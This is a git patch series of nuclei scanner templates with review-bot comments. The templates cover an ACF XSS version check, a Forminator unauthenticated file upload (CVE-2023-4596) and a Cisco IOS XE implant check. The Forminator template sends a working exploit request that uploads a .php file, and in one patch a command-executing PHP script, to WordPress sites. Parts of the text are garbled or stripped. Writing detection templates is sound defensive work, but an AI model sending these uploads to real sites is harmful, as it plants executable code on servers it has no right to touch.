From 089e3242c1e0658175ba0c8d1af3d2f1a6e4a1da Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Tue, 22 Aug 2023 10:57:57 +0200 Subject: [PATCH 01/15] Add files via upload --- http/cves/2023/CVE-2023-40068.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2023/CVE-2023-40068.yaml diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml new file mode 100644 index 00000000000..c46f70af85a --- /dev/null +++ b/http/cves/2023/CVE-2023-40068.yaml 
@@ -0,0 +1,51 @@ +id: CVE-2023-40068 + +info: + name: XSS in Wordpress plugin, Advanced Custom Fields + author: E1A + severity: Low + description: | + A cross-site scripting (XSS) vulnerability has been found in the Advanced Custom Fields (ACF) and Advanced Custom Fields Pro WordPress plugins. The vulnerability, tracked as CVE-2023-40068, affects versions 6.1.0 to 6.1.7 of the plugins. With a staggering 2 million active installs globally, the implications of such vulnerabilities in the ACF plugins are undoubtedly severe. + reference: + - https://securityonline.info/wordpress-custom-field-plugin-bug-cve-2023-40068-exposes-1m-sites-to-xss-attacks/ + - https://twitter.com/fofabot/status/1693897359217099078 + - https://jvn.jp/en/jp/JVN98946408/index.html + - https://wordpress.org/plugins/advanced-custom-fields + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" + - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" + payloads: + last_version: + - 6.2.0 + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' \ No newline at end of file From 88728564b2f56d90e93482ed786fa526131a8305 Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Tue, 22 Aug 2023 11:49:23 +0200 Subject: [PATCH 02/15] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index c46f70af85a..d13dd1fc98b 100644 
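Review bot: With `matchers-condition: or`, the last matcher in the hunk (`- type: regex` on `'(?i)Stable.tag:\s?([\w.]+)'`) fires on every readme.txt that carries a Stable tag line, so the `outdated_version` DSL matcher never gates anything and every ACF / ACF Pro install is reported as CVE-2023-40068 whatever its version. Drop that third matcher (or change to `matchers-condition: and`) so `compare_versions(internal_detected_version, concat("< ", last_version))` alone decides. `severity: Low` should follow the repository's lowercase convention (`severity: low`, as `severity: critical` is written later in this series), and the template has no `tags` or `classification` block, which the other templates in the PR carry. Patches 02 and 03 only reindent `- 6.2.0` and add the trailing newline, so neither point is addressed later.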
--- a/http/cves/2023/CVE-2023-40068.yaml
+++ b/http/cves/2023/CVE-2023-40068.yaml
@@ -20,7 +20,7 @@ http:
 - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt"
 payloads:
 last_version:
- - 6.2.0
+ - 6.2.0
 extractors:
 - type: regex
@@ -48,4 +48,4 @@ http:
 - type: regex
 part: body
 regex:
- - '(?i)Stable.tag:\s?([\w.]+)'
\ No newline at end of file
+ - '(?i)Stable.tag:\s?([\w.]+)'
From 4b8d227a3d31a7ddb01a1e2c0f75124469f3c369 Mon Sep 17 00:00:00 2001
From: E1A <57531297+E1A@users.noreply.github.com>
Date: Tue, 22 Aug 2023 11:52:15 +0200
Subject: [PATCH 03/15] Update CVE-2023-40068.yaml
---
http/cves/2023/CVE-2023-40068.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml
index d13dd1fc98b..2da6674fa28 100644
--- a/http/cves/2023/CVE-2023-40068.yaml
+++ b/http/cves/2023/CVE-2023-40068.yaml
@@ -20,7 +20,7 @@ http:
 - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt"
 payloads:
 last_version:
- - 6.2.0
+ - 6.2.0
 extractors:
 - type: regex
From b6be56c5b452d4663e308a2c9fd98e9101c072cd Mon Sep 17 00:00:00 2001
From: E1A <57531297+E1A@users.noreply.github.com>
Date: Wed, 30 Aug 2023 21:14:26 +0200
Subject: [PATCH 04/15] Delete http/cves/2023/CVE-2023-40068.yaml
---
http/cves/2023/CVE-2023-40068.yaml | 51 ------------------------------
1 file changed, 51 deletions(-)
delete mode 100644 http/cves/2023/CVE-2023-40068.yaml
diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml
deleted file mode 100644
index 2da6674fa28..00000000000
--- a/http/cves/2023/CVE-2023-40068.yaml
+++ /dev/null
@@ -1,51 +0,0 @@ -id: CVE-2023-40068 - -info: - name: XSS in Wordpress plugin, Advanced Custom Fields - author: E1A - severity: Low - description: | - A cross-site scripting (XSS) vulnerability has been found in the Advanced Custom Fields (ACF) and Advanced Custom Fields Pro WordPress plugins. The vulnerability, tracked as CVE-2023-40068, affects versions 6.1.0 to 6.1.7 of the plugins. With a staggering 2 million active installs globally, the implications of such vulnerabilities in the ACF plugins are undoubtedly severe. - reference: - - https://securityonline.info/wordpress-custom-field-plugin-bug-cve-2023-40068-exposes-1m-sites-to-xss-attacks/ - - https://twitter.com/fofabot/status/1693897359217099078 - - https://jvn.jp/en/jp/JVN98946408/index.html - - https://wordpress.org/plugins/advanced-custom-fields - -http: - - method: GET - - path: - - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" - - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" - payloads: - last_version: - - 6.2.0 - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' From bc8f7ce18749074913b1c003d01bb243243a1077 Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 30 Aug 2023 21:35:56 +0200 Subject: [PATCH 05/15] Create CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 85 ++++++++++++++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 http/cves/2023/CVE-2023-40068.yaml 
diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml new file mode 100644 index 00000000000..92e7e5393fc --- /dev/null +++ b/http/cves/2023/CVE-2023-40068.yaml 
@@ -0,0 +1,85 @@ +id: CVE-2023-4596 +info: + name: Forminator unauthenticated arbitrary file upload vulnerability + author: E1A + severity: critical + description: The Forminator plugin for WordPress is vulnerable to arbitrary file + uploads due to file type validation occurring after a file has been uploaded to + the server in the upload_post_image() function in versions up to, and including, + 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary + files on the affected site's server which may make remote code execution possible. + reference: + - https://www.exploit-db.com/exploits/51664 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve + - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-4596 + cwe-id: CWE-434 + metadata: + max-request: 1 + google-query: inurl:"/wp-content/plugins/Forminator" + tags: cve,cve2023,Forminator,wordpress + +http: + - raw: + - | + GET /?p=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe + + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" + Content-Type: application/x-php + + test + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="forminator_nonce" + + {{forminator_nonce}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="form_id" + + {{form_id}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="current_url" + + {{BaseURL}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="action" + + forminator_submit_form_custom-forms + + 
matchers-condition: and + matchers: + - type: word + part: body + condition: and + words: + - extension is not allowed. + + - type: status + status: + - 200 + + extractors: + - type: regex + name: forminator_nonce + group: 1 + regex: + - '\b[0-9a-fA-F]{10}\b' + internal: true + part: body + + - type: regex + name: form_id + group: 1 + regex: + - '[0-9]' + part: body From 5931319b1d10ece62779978c467d5cab1e768f3c Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 30 Aug 2023 21:47:39 +0200 Subject: [PATCH 06/15] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 92e7e5393fc..bef0d7bda23 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -25,14 +25,17 @@ info: http: - raw: - | - GET /?p=1 HTTP/1.1 + GET {{Path}} HTTP/1.1 Host: {{Hostname}} Accept: */* - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe + Origin: {{BaseURL}} + Referer: {{BaseURL}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" From 7d93712fd3c473376abc93d0d0b393bdb4ab078c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 31 Aug 2023 01:18:01 +0530 Subject: [PATCH 07/15] misc update --- http/cves/2023/CVE-2023-40068.yaml | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 92e7e5393fc..9f51384f06f 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml 
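Review bot: `id: CVE-2023-4596` on the first line of this hunk does not match the file it is written into, `http/cves/2023/CVE-2023-40068.yaml`, which is still named after the ACF XSS template deleted in the previous commit; the Forminator template belongs in `http/cves/2023/CVE-2023-4596.yaml` so the id/filename consistency check and the CVE index stay correct. `max-request: 1` under `metadata` is also wrong for a template that sends two raw requests (`GET /?p=1` and `POST /wp-admin/admin-ajax.php`) and should read `max-request: 2`; the same stale value is carried as context in patch 07 (`@@ -17,10 +15,11 @@`) and patch 11 (`@@ -19,8 +20,9 @@`), and patch 09 raises the real count to three without touching it. `tags: cve,cve2023,Forminator,wordpress` mixes a capitalised tag into an otherwise lowercase list, which patch 11 later normalises.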
@@ -1,13 +1,11 @@ id: CVE-2023-4596 + info: - name: Forminator unauthenticated arbitrary file upload vulnerability + name: WordPress Plugin Forminator 1.24.6 - Remote Command Execution author: E1A severity: critical - description: The Forminator plugin for WordPress is vulnerable to arbitrary file - uploads due to file type validation occurring after a file has been uploaded to - the server in the upload_post_image() function in versions up to, and including, - 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary - files on the affected site's server which may make remote code execution possible. + description: | + The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. reference: - https://www.exploit-db.com/exploits/51664 - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve @@ -17,10 +15,11 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4596 cwe-id: CWE-434 + epss-score: 0.00343 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/Forminator" - tags: cve,cve2023,Forminator,wordpress + tags: cve,cve2023,Forminator,wordpress,intrusive http: - raw: @@ -55,12 +54,10 @@ http: Content-Disposition: form-data; name="action" forminator_submit_form_custom-forms - + matchers-condition: and matchers: - type: word - part: body - condition: and words: - extension is not allowed. @@ -75,11 +72,10 @@ http: regex: - '\b[0-9a-fA-F]{10}\b' internal: true - part: body - type: regex name: form_id group: 1 regex: - '[0-9]' - part: body + internal: true From 151d5e4dcfb04263fec2964cee096e6a4858e15a Mon Sep 17 00:00:00 2001 
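Review bot: The `index 92e7e5393fc..9f51384f06f` line of this patch names patch 05's blob as its base rather than the `bef0d7bda23` produced by patch 06, so the hunks starting at `@@ -1,13 +1,11 @@` appear to have been made against a stale copy and the `GET {{Path}}` and extra-header changes from patch 06 are not carried here; patch 08 then starts from yet another blob (`6eaa4041892`), so the series does not apply linearly and should be rebased or squashed before merge. In the `@@ -75,11 +72,10 @@` hunk, marking `form_id` as `internal: true` is right, but its regex `'[0-9]'` still captures only the first digit found anywhere in the page, so the `{{form_id}}` posted to admin-ajax is unlikely to be the form's id until the pattern is anchored to the hidden input. The reflowed `description: |` block scalar now holds one very long line; wrapping it at the same indent would keep the rendered text identical and the diff reviewable.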
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 11 Sep 2023 20:44:40 +0530 Subject: [PATCH 08/15] regex updated --- http/cves/2023/CVE-2023-40068.yaml | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 6eaa4041892..3cb0eb2a466 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -18,23 +18,19 @@ info: epss-score: 0.00343 metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/Forminator" + publicwww-query: "/wp-content/plugins/Forminator" tags: cve,cve2023,Forminator,wordpress,intrusive http: - raw: - | - GET {{Path}} HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} - Accept: */* + - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - X-Requested-With: XMLHttpRequest - Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe - Origin: {{BaseURL}} - Referer: {{BaseURL}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" @@ -71,14 +67,16 @@ http: extractors: - type: regex name: forminator_nonce + part: body group: 1 regex: - - '\b[0-9a-fA-F]{10}\b' + - 'name="forminator_nonce" value="([a-z0-9]+)" \/>' internal: true - type: regex name: form_id + part: body group: 1 regex: - - '[0-9]' + - 'name="form_id" value="([0-9]+)">' internal: true From 8fe5780891f4bc44c74e3fc06beb9e93f67137f0 Mon Sep 17 00:00:00 2001 From: E1A Date: Wed, 13 Sep 2023 09:24:47 +0200 Subject: [PATCH 09/15] Changed template like the script --- http/cves/2023/CVE-2023-40068.yaml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 3cb0eb2a466..d5624a1d9a8 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml 
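Review bot: The two new extractor regexes in `@@ -71,14 +67,16 @@` expect different hidden-input markup: `'name="forminator_nonce" value="([a-z0-9]+)" \/>'` requires a space and a self-closing slash, while `'name="form_id" value="([0-9]+)">'` requires `>` immediately after the closing quote, so whichever way the plugin actually renders these inputs, one of the two is likely to miss and the POST then goes out with an unresolved `{{forminator_nonce}}` or `{{form_id}}`. Accepting both forms, e.g. `'name="form_id" value="([0-9]+)"\s*\/?>'` and the same `\s*\/?>` tail on the nonce pattern, makes the extraction robust to that variation; the `\/` escape is unnecessary in Go regexp but harmless. Replacing `GET {{Path}}` with `GET /` in the first hunk also silently assumes a Forminator form is rendered on the front page, which deserves a comment above that request, e.g. `# assumes a Forminator form (with nonce and form_id inputs) is embedded on /`.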
@@ -10,6 +10,7 @@ info: - https://www.exploit-db.com/exploits/51664 - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php + - https://github.com/E1A/CVE-2023-4596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -33,10 +34,16 @@ http: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe ------WebKitFormBoundaryBLOYSueQAdgN2PRe - Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php" + Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}" Content-Type: application/x-php - test + $output"; + ?> ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="forminator_nonce" @@ -54,15 +61,9 @@ http: forminator_submit_form_custom-forms - matchers-condition: and - matchers: - - type: word - words: - - extension is not allowed. - - - type: status - status: - - 200 + - | + GET /wp-content/uploads/{{date_time("%Y-%M")}}/{{randstr}} HTTP/1.1 + Host: {{Hostname}} extractors: - type: regex From ec427cc415597424a786eafea6ca9eba9f6f7d34 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 13 Sep 2023 14:22:51 +0530 Subject: [PATCH 10/15] matcher updated --- http/cves/2023/CVE-2023-40068.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index d5624a1d9a8..16e4905f4c5 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml 
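Review bot: The upload body in `@@ -33,10 +34,16 @@` changes from the inert string `test` to a PHP script (its opening tag was lost in this rendering, but the surviving `$output"; ?>` shows a script that runs a command and echoes the result), and nothing in the template removes that file afterwards, so every positive scan leaves a live executable under the target's `wp-content/uploads/`. A detection template does not need code execution: upload a file whose body is only a unique marker such as `{{randstr}}` and confirm the finding by matching that marker in the follow-up GET, which proves the unrestricted upload without leaving anything that runs. `filename="{{randstr}}"` also has no extension in this hunk, which patch 10 addresses.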
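Review bot: After `@@ -54,15 +61,9 @@` the template has no `matchers` block at all and both extractors are `internal: true`, so as far as I can tell nuclei will never report a result from it; the new third request needs at least a matcher on `body_3` (plus a `status` matcher) that confirms the uploaded file is served back. The path `/wp-content/uploads/{{date_time("%Y-%M")}}/{{randstr}}` also renders as `YYYY-MM`, whereas a default WordPress uploads directory is laid out as `uploads/YYYY/MM/`; if that is the layout Forminator writes to, the GET will 404 even on a vulnerable site and `{{date_time("%Y/%M")}}` is what is wanted. `metadata: max-request: 1` is not updated for the third request either.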
@@ -34,7 +34,7 @@ http: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe ------WebKitFormBoundaryBLOYSueQAdgN2PRe - Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}" + Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php" Content-Type: application/x-php Date: Tue, 26 Sep 2023 23:39:38 +0530 Subject: [PATCH 11/15] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 56 +++++++++++++++++++++--------- 1 file changed, 40 insertions(+), 16 deletions(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 16e4905f4c5..1b1317cac5c 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -1,7 +1,7 @@ id: CVE-2023-4596 info: - name: WordPress Plugin Forminator 1.24.6 - Remote Command Execution + name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload author: E1A severity: critical description: | @@ -11,6 +11,7 @@ info: - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php - https://github.com/E1A/CVE-2023-4596 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -19,8 +20,9 @@ info: epss-score: 0.00343 metadata: max-request: 1 + verified: true publicwww-query: "/wp-content/plugins/Forminator" - tags: cve,cve2023,Forminator,wordpress,intrusive + tags: cve,cve2023,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce http: - raw: 
@@ -29,21 +31,32 @@ http: Host: {{Hostname}} - | + @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="textarea-1" + + {{randstr}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="phone-1" + + {{rand_int(10)}} + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="email-1" + + test@gmail.com + ------WebKitFormBoundaryBLOYSueQAdgN2PRe + Content-Disposition: form-data; name="name-1" + + {{randstr}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php" Content-Type: application/x-php - $output"; - ?> + ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="forminator_nonce" @@ -60,17 +73,28 @@ http: Content-Disposition: form-data; name="action" forminator_submit_form_custom-forms + ------WebKitFormBoundaryBLOYSueQAdgN2PRe - - | - GET /wp-content/uploads/{{date_time("%Y-%M")}}/{{randstr}}.php HTTP/1.1 - Host: {{Hostname}} - + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: body_1 words: - - "dns" - - "http" + - 'Upload file' + - 'forminator-field-upload' + condition: and + + - type: word + part: body_2 + words: + - '{"success":true' + - '"form_id":"{{form_id}}"' + - '"behav' + condition: and + + - type: status + status: + - 200 extractors: - type: regex From ee37aa6ef324af628cb9403528d842980372a571 Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 18 Oct 2023 10:46:32 +0200 Subject: [PATCH 12/15] Create CVE-2023-20198.yaml Update from @rxerium his template --- http/cves/CVE-2023-20198.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/CVE-2023-20198.yaml 
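Review bot: `email-1` is populated with `test@gmail.com` in `@@ -29,21 +31,32 @@`, so every scan stores a form entry carrying a real third-party mailbox in the target's Forminator submissions and any notification the form sends goes to that address; use an RFC 2606 reserved domain instead, e.g. `{{randstr}}@example.com`. The body of the `.php` part was lost in this rendering, so I cannot see what replaced the command-executing script; whatever it is, the `intrusive` and `rce` tags added in the previous hunk should reflect what the uploaded file actually does. `@timeout: 15s` is a reasonable override but a one-line comment above it saying why the default is insufficient for this POST would help the next maintainer.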
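Review bot: The replacement matchers in `@@ -60,17 +73,28 @@` only establish that a form with an upload field exists (`body_1`) and that the submission was accepted (`{"success":true` and the echoed `"form_id":"{{form_id}}"` in `body_2`); with the follow-up GET removed, nothing confirms the `.php` file was stored or is reachable, so a fixed version that accepts the submission but discards the disallowed file would still match. If a patched plugin is known to reject the `.php` part before answering, say so in a comment on the `body_2` matcher, e.g. `# a patched Forminator rejects the .php part before responding, so success:true implies the file was saved`; otherwise restore a request for the uploaded file and match on its marker. `'"behav'` looks like a truncated key; if `"behavior"` is meant, write it out so the match is not satisfied by unrelated JSON.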
diff --git a/http/cves/CVE-2023-20198.yaml b/http/cves/CVE-2023-20198.yaml
new file mode 100644
index 00000000000..d5a5e03197a
--- /dev/null
+++ b/http/cves/CVE-2023-20198.yaml
@@ -0,0 +1,25 @@
+id: CVE-2023-20198
+info:
+ name: Cisco IOS XE Privilege Esculation detection
+ author: E1A & rxerium
+ severity: critical
+ description: |
+ A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity.
+ remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`"
+ reference:
+ - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
+ - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/
+ - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/
+ tags: cve,cve2023,cisco
+
+requests:
+ - raw:
+ - |+
+ POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - '[0-9a-fA-F]+'
From e057567c943a4543424afe6a97592cab273b98ec Mon Sep 17 00:00:00 2001
From: no
Date: Wed, 18 Oct 2023 10:57:11 +0200
Subject: [PATCH 13/15] update from other pr
---
http/cves/2023/CVE-2023-20198.yaml | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-20198.yaml
diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml
new file mode 100644
index 00000000000..00388df9099
--- /dev/null
+++ b/http/cves/2023/CVE-2023-20198.yaml
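Review bot: The only matcher, `regex: - '[0-9a-fA-F]+'` on `part: body`, is satisfied by any response containing a single digit or a letter a–f, i.e. practically every HTML page, so this template will flag almost every host that answers the POST; the advisory linked first in `reference` describes the implant answering `logoutconfirm.html?logon_hash=1` with a body that is nothing but a hexadecimal string, so the pattern should be anchored to the whole body, e.g. `- '^[0-9a-fA-F]+$'`, combined with a `status: 200` matcher under `matchers-condition: and`. Beyond that, the request tests for the presence of the implant (a post-compromise indicator), not for whether the device is unpatched, so a vulnerable but uncompromised device is not detected; `name` and `description` should say so (e.g. `name: Cisco IOS XE Web UI Implant Check (CVE-2023-20198)`), and `Esculation` is a typo for `Escalation`. `requests:` is the deprecated spelling of the `http:` key the other template in this series uses, and `info` has no `classification` or `metadata` block. The same file is re-added verbatim under `http/cves/2023/` in patch 13 (`@@ -0,0 +1,25 @@` there) with the same issues, and both copies are then deleted in patches 14 and 15, so the series as it stands merges no Cisco template at all.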
@@ -0,0 +1,25 @@
+id: CVE-2023-20198
+info:
+ name: Cisco IOS XE Privilege Esculation detection
+ author: E1A & rxerium
+ severity: critical
+ description: |
+ A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity.
+ remediation: "Disable the HTTP server feature on internet-facing systems by running one of the following commands in global configuration mode: `no ip http server` or `no ip http secure-server`"
+ reference:
+ - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
+ - https://www.bleepingcomputer.com/news/security/cisco-warns-of-new-ios-xe-zero-day-actively-exploited-in-attacks/
+ - https://socradar.io/cisco-warns-of-exploitation-of-a-maximum-severity-zero-day-vulnerability-in-ios-xe-cve-2023-20198/
+ tags: cve,cve2023,cisco
+
+requests:
+ - raw:
+ - |+
+ POST /webui/logoutconfirm.html?logon_hash=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - '[0-9a-fA-F]+'
\ No newline at end of file
From 750068a98d9cf35cf3818be51b47da8dcdaee46f Mon Sep 17 00:00:00 2001
From: E1A <57531297+E1A@users.noreply.github.com>
Date: Tue, 31 Oct 2023 13:08:32 +0100
Subject: [PATCH 14/15] Delete http/cves/2023/CVE-2023-20198.yaml
---
http/cves/2023/CVE-2023-20198.yaml | 25 -------------------------
1 file changed, 25 deletions(-)
delete mode 100644 http/cves/2023/CVE-2023-20198.yaml
diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml
deleted file mode 100644
index 00388df9099..00000000000
--- a/http/cves/2023/CVE-2023-20198.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2023-20198
-info:
- name: Cisco IOS XE Privilege Esculation detection
- author: E1A & rxerium
- severity: critical
- description: |
- A vulnerability in the Web User Interface (Web UI) of Cisco IOS XE software allows an attacker to create an account on the affected device with privilege level 15 access, effectively granting them full control of the compromised device and allowing possible subsequent unauthorized activity.
